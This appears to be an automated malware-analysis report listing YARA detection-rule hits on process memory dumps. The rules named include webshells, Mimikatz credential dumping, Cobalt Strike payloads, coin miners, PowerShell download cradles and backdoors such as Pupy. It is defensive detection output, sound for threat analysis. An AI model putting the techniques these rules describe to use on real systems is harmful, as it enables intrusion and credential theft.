Source: 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp, type: MEMORY	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY	Matched rule: gh0st author = https://github.com/jackcr/
Source: 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_sql date = 2021/03/14, author = Arnim Rupp, description = ASP webshell giving SQL access. Might also be a dual use tool., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000026.00000003.18354456744.00000138BD776000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18330858645.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18336867211.00000138BDB98000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18318886682.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18309314406.00000138BD524000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_obfuscated date = 2021/01/12, author = Arnim Rupp, description = ASP webshell obfuscated, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000026.00000003.18357864029.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_base64_encoded_payloads date = 2021/01/07, author = Arnim Rupp, description = php webshell containing base64 encoded payload, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 88d0d4696c9cb2d37d16e330e236cb37cfaec4cd
Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000026.00000003.18342844275.00000138BE522000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Suspicious_PowerShell_WebDownload_1 date = 2017-02-22, author = Florian Roth, description = Detects suspicious PowerShell code that downloads from web sites, type = file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = Internal Research
Source: 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoldDragon_Aux_File date = 2018-02-03, author = Florian Roth, description = Detects export from Gold Dragon - February 2018, reference = https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CVE_2018_4878_0day_ITW Description = This signature is mostly public sourced and detects an in-the-wild exploit for CVE-2018-4878., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18332072554.00000138BE522000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000026.00000003.18346478440.00000138BD16D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18354111280.00000138BE522000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 00000026.00000003.18342492638.00000138BE45C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000026.00000003.18328143856.00000138BDCA0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
